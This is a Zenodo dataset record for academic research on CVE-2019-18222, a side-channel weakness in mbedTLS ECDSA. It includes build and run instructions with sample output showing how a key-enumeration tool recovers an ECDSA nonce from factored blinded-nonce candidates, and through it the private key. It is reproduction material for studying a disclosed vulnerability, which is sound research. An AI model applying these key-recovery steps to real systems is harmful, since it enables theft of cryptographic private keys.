Dataset Open Access

CVE-2019-18222: research data and tooling

Alejandro Cabrera Aldaya; Billy Bob Brumley


DataCite XML Export

<?xml version='1.0' encoding='utf-8'?>
<resource xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns="http://datacite.org/schema/kernel-4" xsi:schemaLocation="http://datacite.org/schema/kernel-4 http://schema.datacite.org/meta/kernel-4.1/metadata.xsd">
  <identifier identifierType="DOI">10.5281/zenodo.3605805</identifier>
  <creators>
    <creator>
      <creatorName>Alejandro Cabrera Aldaya</creatorName>
      <nameIdentifier nameIdentifierScheme="ORCID" schemeURI="http://orcid.org/">0000-0002-1544-6772</nameIdentifier>
      <affiliation>Tampere University</affiliation>
    </creator>
    <creator>
      <creatorName>Billy Bob Brumley</creatorName>
      <nameIdentifier nameIdentifierScheme="ORCID" schemeURI="http://orcid.org/">0000-0001-9160-0463</nameIdentifier>
      <affiliation>Tampere University</affiliation>
    </creator>
  </creators>
  <titles>
    <title>CVE-2019-18222: research data and tooling</title>
  </titles>
  <publisher>Zenodo</publisher>
  <publicationYear>2020</publicationYear>
  <subjects>
    <subject>side-channel analysis</subject>
    <subject>ECDSA</subject>
    <subject>binary GCD</subject>
    <subject>modular inversion</subject>
    <subject>Intel SGX</subject>
    <subject>mbedTLS</subject>
  </subjects>
  <dates>
    <date dateType="Issued">2020-01-13</date>
  </dates>
  <language>en</language>
  <resourceType resourceTypeGeneral="Dataset"/>
  <alternateIdentifiers>
    <alternateIdentifier alternateIdentifierType="url">https://zenodo.org/record/3605805</alternateIdentifier>
  </alternateIdentifiers>
  <relatedIdentifiers>
    <relatedIdentifier relatedIdentifierType="URL" relationType="IsCitedBy" resourceTypeGeneral="Preprint">https://eprint.iacr.org/2020/055</relatedIdentifier>
    <relatedIdentifier relatedIdentifierType="DOI" relationType="IsVersionOf">10.5281/zenodo.3605804</relatedIdentifier>
  </relatedIdentifiers>
  <rightsList>
    <rights rightsURI="https://opensource.org/licenses/MIT">MIT License</rights>
    <rights rightsURI="info:eu-repo/semantics/openAccess">Open Access</rights>
  </rightsList>
  <descriptions>
    <description descriptionType="Abstract">&lt;p&gt;This dataset and software tool are for reproducing the research results related to CVE-2019-18222.&lt;/p&gt;

&lt;p&gt;Description&lt;/p&gt;

&lt;ul&gt;
	&lt;li&gt;&lt;code&gt;enum&lt;/code&gt; contains the key enumeration tool.&lt;/li&gt;
	&lt;li&gt;&lt;code&gt;kt_candidates&lt;/code&gt; contains the JSON for blinded nonce candidates, indexed by trial number. JSON fields:&lt;/li&gt;
&lt;/ul&gt;

&lt;ol&gt;
	&lt;li&gt;&lt;code&gt;kt_candidates&lt;/code&gt;: list of nonce candidates.&lt;/li&gt;
&lt;/ol&gt;

&lt;ul&gt;
	&lt;li&gt;&lt;code&gt;sig_data&lt;/code&gt; contains the JSON for ECDSA signatures, index by trial number. JSON fields:&lt;/li&gt;
&lt;/ul&gt;

&lt;ol&gt;
	&lt;li&gt;&lt;code&gt;p&lt;/code&gt;: the prime the curve is defined over. (P-256 here.)&lt;/li&gt;
	&lt;li&gt;&lt;code&gt;Gx&lt;/code&gt;, &lt;code&gt;Gy&lt;/code&gt;: Generator coordinates.&lt;/li&gt;
	&lt;li&gt;&lt;code&gt;d&lt;/code&gt;: Ground truth ECDSA long term key.&lt;/li&gt;
	&lt;li&gt;&lt;code&gt;Px&lt;/code&gt;, &lt;code&gt;Py&lt;/code&gt;: Public key coordinates.&lt;/li&gt;
	&lt;li&gt;&lt;code&gt;h&lt;/code&gt;: SHA-256 digest to sign, encoded to the finite field.&lt;/li&gt;
	&lt;li&gt;&lt;code&gt;k&lt;/code&gt;: Ground truth ECDSA nonce.&lt;/li&gt;
	&lt;li&gt;&lt;code&gt;r&lt;/code&gt;, &lt;code&gt;s&lt;/code&gt;: ECDSA signature.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Build&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;cd enum
make clean
make&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;Run&lt;/p&gt;

&lt;p&gt;Start with &lt;code&gt;enum&lt;/code&gt; as the working directory.&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;cd enum&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;Pull out a &lt;code&gt;kt&lt;/code&gt; candidate, in this example index 847.&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;$ jq '.kt_candidates' ../kt_candidates/kt_candidates_847.json
[
  "0x48ad7217d10f6c7b1a3db836d38aa3972999115f38a6b3d176fc660941aa5c882d2528ec1fc27da7610e7ee3d7dd84367c380259e0386224c2c46aa2a5eb2a0"
]&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;Factor that candidate.&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;$ time sage -c "print ecm.factor(0x48ad7217d10f6c7b1a3db836d38aa3972999115f38a6b3d176fc660941aa5c882d2528ec1fc27da7610e7ee3d7dd84367c380259e0386224c2c46aa2a5eb2a0)"
[2, 2, 2, 2, 2, 3, 353, 193243, 1540830719, 9263081209, 103633959617085683, 151389566295160172521, 283135469779419532841, 572987990320782777757565685333349772719941819448953457732874126833]

real    0m5.837s
user    0m5.648s
sys 0m0.214s&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;Now pull out the &lt;code&gt;r&lt;/code&gt; component of the ECDSA signature for that index, and convert it from hex to base 10.&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;$ jq '.r' ../sig_data/sig_data_847.json
"0x30e2ce20a8140177a31a66763d85f431acc9790dd050ffc22ed5d454cdfbbb67"
$ python -c "print 0x30e2ce20a8140177a31a66763d85f431acc9790dd050ffc22ed5d454cdfbbb67"
22111746808803128586382711090186612204136854333384650261207856620766542674791&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;Now run the &lt;code&gt;enum&lt;/code&gt; tool to recover the nonce.&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;$ ./enum 
Usage: ./enum &amp;lt;jobs_num&amp;gt; &amp;lt;jobs_id&amp;gt; &amp;lt;target_base_10&amp;gt; space delimited flat list of factors in base ten&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;The &lt;code&gt;&amp;lt;jobs_num&amp;gt;&lt;/code&gt; and &lt;code&gt;&amp;lt;jobs_id&amp;gt;&lt;/code&gt; arguments are to ease parallel execution; read the source code. But for a single core, pass them as &lt;code&gt;1 0&lt;/code&gt;.&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;$ ./enum 1 0 22111746808803128586382711090186612204136854333384650261207856620766542674791 2 2 2 2 2 3 353 193243 1540830719 9263081209 103633959617085683 151389566295160172521 2831354697794195
32841 572987990320782777757565685333349772719941819448953457732874126833
INFO:target:30E2CE20A8140177A31A66763D85F431ACC9790DD050FFC22ED5D454CDFBBB67
INFO:found:31A52C4960857E6D2F7AD82BAC7D55CE6CC9AD13B959F069002B6A949EA6A048
INFO:tests:7879&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;where &lt;code&gt;221..791&lt;/code&gt; is the base-10 &lt;code&gt;r&lt;/code&gt; component of the ECDSA signature, and &lt;code&gt;2 2 .. 572..833&lt;/code&gt; is the full list of blinded nonce factors. In the output:&lt;/p&gt;

&lt;ul&gt;
	&lt;li&gt;&lt;code&gt;INFO:target:&amp;lt;hex&amp;gt;&lt;/code&gt; is the hex form of base-10 target input (ECDSA &lt;code&gt;r&lt;/code&gt; component).&lt;/li&gt;
	&lt;li&gt;&lt;code&gt;INFO:found:&amp;lt;hex&amp;gt;&lt;/code&gt; is the hex form of the recovered ECDSA nonce.&lt;/li&gt;
	&lt;li&gt;&lt;code&gt;INFO:tests:&amp;lt;num&amp;gt;&lt;/code&gt; is the number of tested nonce candidates (scalar multiplications).&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;We can see this successfully recovered the nonce (hence long term ECDSA private key) correctly:&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;$ jq '.k' ../sig_data/sig_data_847.json
"0x31a52c4960857e6d2f7ad82bac7d55ce6cc9ad13b959f069002b6a949ea6a048"&lt;/code&gt;&lt;/pre&gt;</description>
  </descriptions>
  <fundingReferences>
    <fundingReference>
      <funderName>European Commission</funderName>
      <funderIdentifier funderIdentifierType="Crossref Funder ID">10.13039/501100000780</funderIdentifier>
      <awardNumber awardURI="info:eu-repo/grantAgreement/EC/H2020/804476/">804476</awardNumber>
      <awardTitle>Side-Channel Aware Engineering</awardTitle>
    </fundingReference>
  </fundingReferences>
</resource>
186
14
views
downloads
All versions This version
Views 186186
Downloads 1414
Data volume 18.1 MB18.1 MB
Unique views 164164
Unique downloads 1313

Share

Cite as